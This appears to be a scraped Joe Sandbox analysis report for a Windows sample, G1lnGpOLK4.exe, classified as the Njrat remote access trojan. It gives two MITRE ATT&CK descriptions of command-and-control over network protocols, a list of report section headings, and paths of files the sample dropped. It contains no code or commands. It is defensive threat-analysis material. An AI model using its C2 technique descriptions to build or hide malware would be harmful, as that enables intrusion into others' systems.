Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report G1lnGpOLK4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Njrat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojnmq5j.r54.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ed1lrobr.tzh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mf1svetu.2wj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqnjg344.x0n.ps1

Chrome Cache Entry: 51

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
G1lnGpOLK4.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre